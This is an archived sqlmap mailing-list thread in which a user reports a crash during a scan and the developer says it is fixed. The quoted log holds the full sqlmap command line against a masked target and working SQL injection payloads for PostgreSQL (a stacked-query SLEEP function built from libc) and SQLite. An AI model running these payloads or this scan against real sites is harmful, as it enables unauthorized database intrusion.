Re: [sqlmap-users] New Error
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] New Error
|
From: Miroslav S. <mir...@gm...> - 2010-12-20 22:39:35
|
hi. it seems that it wasn't previously properly fixed (by me). now it shouldn't be a problem any more. kr On Fri, Dec 17, 2010 at 8:48 AM, Miroslav Stampar <mir...@gm...> wrote: > thx a lot nightman. > > find it fixed in the latest revision from SVN repository. > > kr > > On Fri, Dec 17, 2010 at 7:34 AM, <nig...@em...> wrote: >> sqlmap -u "http://xxxxxx.xxx/html.php?Html_showFile=rss&app_state=4f25b469f81cab0f&xxx=1" -o -a C:\pentest\sqlmap.0.9\txt\user-agents.txt --level 5 --risk 3 -f -b >> [03:44:42] [INFO] testing connection to the target url >> [03:44:52] [INFO] testing NULL connection to the target url >> [03:44:57] [INFO] testing if the url is stable, wait a few seconds >> [03:45:00] [INFO] url is stable >> all the tests.... >> >> Cookie parameter 'app_state' is vulnerable. Do you want to keep testing the others? [y/N] y >> sqlmap identified the following injection points with 10051 HTTP(s) requests: >> --- >> Place: GET >> Parameter: xxx >> Type: stacked queries >> Title: PostgreSQL < 8.2 stacked queries (Glibc) >> Payload: Html_showFile=rss&app_state=4f25b469f81cab0f&xxx=1))); CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS CHR(47)| >> |CHR(108)||CHR(105)||CHR(98)||CHR(47)||CHR(108)||CHR(105)||CHR(98)||CHR(99)||CHR(46)||CHR(115)||CHR(111)||CHR(46)||CHR(54), CHR(11 >> 5)||CHR(108)||CHR(101)||CHR(101)||CHR(112) language CHR(67) STRICT; SELECT sleep(5);-- AND (((6808=6808 >> >> Place: Cookie >> Parameter: app_state >> Type: stacked queries >> Title: SQLite > 2.0 stacked queries (heavy query) >> Payload: app_state=4f25b469f81cab0f'); SELECT LIKE(X'41'||X'42'||X'43'||X'44'||X'45'||X'46'||X'47', UPPER(HEX(RANDOMBLOB(50000 >> 000))));-- AND ('eLhg' LIKE 'eLhg;frw_test_cookie=1 >> --- >> >> there were multiple injection points, please select the one to use for following injections: >> [0] place: GET, parameter: xxx, type: Unescaped numeric (default) >> [1] place: Cookie, parameter: app_state, type: LIKE single quoted string >> [q] Quit >>> 0 >> [07:24:11] [INFO] testing PostgreSQL >> [07:24:12] [WARNING] the back-end DBMS is not PostgreSQL >> [07:24:12] [INFO] testing MySQL >> [07:24:12] [WARNING] the back-end DBMS is not MySQL >> [07:24:12] [INFO] testing Oracle >> [07:24:12] [WARNING] the back-end DBMS is not Oracle >> [07:24:12] [INFO] testing Microsoft SQL Server >> [07:24:13] [WARNING] the back-end DBMS is not Microsoft SQL Server >> [07:24:13] [INFO] the back-end DBMS is SQLite >> [07:24:13] [INFO] fetching banner >> [07:24:13] [INFO] retrieving the length of query output >> [07:24:13] [INFO] retrieved: >> [07:24:16] [INFO] retrieved: >> [07:24:19] [INFO] testing SQLite >> [07:24:20] [WARNING] the back-end DBMS is not SQLite >> [07:24:20] [INFO] testing Microsoft Access >> [07:24:21] [WARNING] the back-end DBMS is not Microsoft Access >> [07:24:21] [INFO] testing Firebird >> [07:24:21] [WARNING] the back-end DBMS is not Firebird >> [07:24:21] [INFO] testing SAP MaxDB >> [07:24:22] [WARNING] the back-end DBMS is not SAP MaxDB >> [07:24:22] [INFO] testing Sybase >> [07:24:22] [WARNING] the back-end DBMS is not Sybase >> >> [07:24:22] [CRITICAL] unhandled exception in sqlmap/0.9-dev, retry your run with the latest development version from the Subversio >> n repository. If the exception persists, please send by e-mail to sql...@li... the command line, the followi >> ng text and any information needed to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get >> back to you. >> sqlmap version: 0.9-dev >> Python version: 2.6.5 >> Operating system: nt >> Traceback (most recent call last): >> File "C:\pentest\sqlmap.0.9\sqlmap.py", line 79, in main >> start() >> File "C:\pentest\sqlmap.0.9\lib\controller\controller.py", line 393, in start >> action() >> File "C:\pentest\sqlmap.0.9\lib\controller\action.py", line 57, in action >> dataToStdout("%s\n" % conf.dbmsHandler.getFingerprint()) >> AttributeError: 'NoneType' object has no attribute 'getFingerprint' >> >> [*] shutting down at: 07:24:22 >> >> ------------------------------------------------------------------------------ >> Lotusphere 2011 >> Register now for Lotusphere 2011 and learn how >> to connect the dots, take your collaborative environment >> to the next level, and enter the era of Social Business. >> http://p.sf.net/sfu/lotusphere-d2d >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > Miroslav Stampar > > E-mail / Jabber: miroslav.stampar (at) gmail.com > Mobile: +385921010204 (HR 0921010204) > PGP Key ID: 0xB5397B1B > Location: Zagreb, Croatia > -- Miroslav Stampar E-mail / Jabber: miroslav.stampar (at) gmail.com Mobile: +385921010204 (HR 0921010204) PGP Key ID: 0xB5397B1B Location: Zagreb, Croatia |
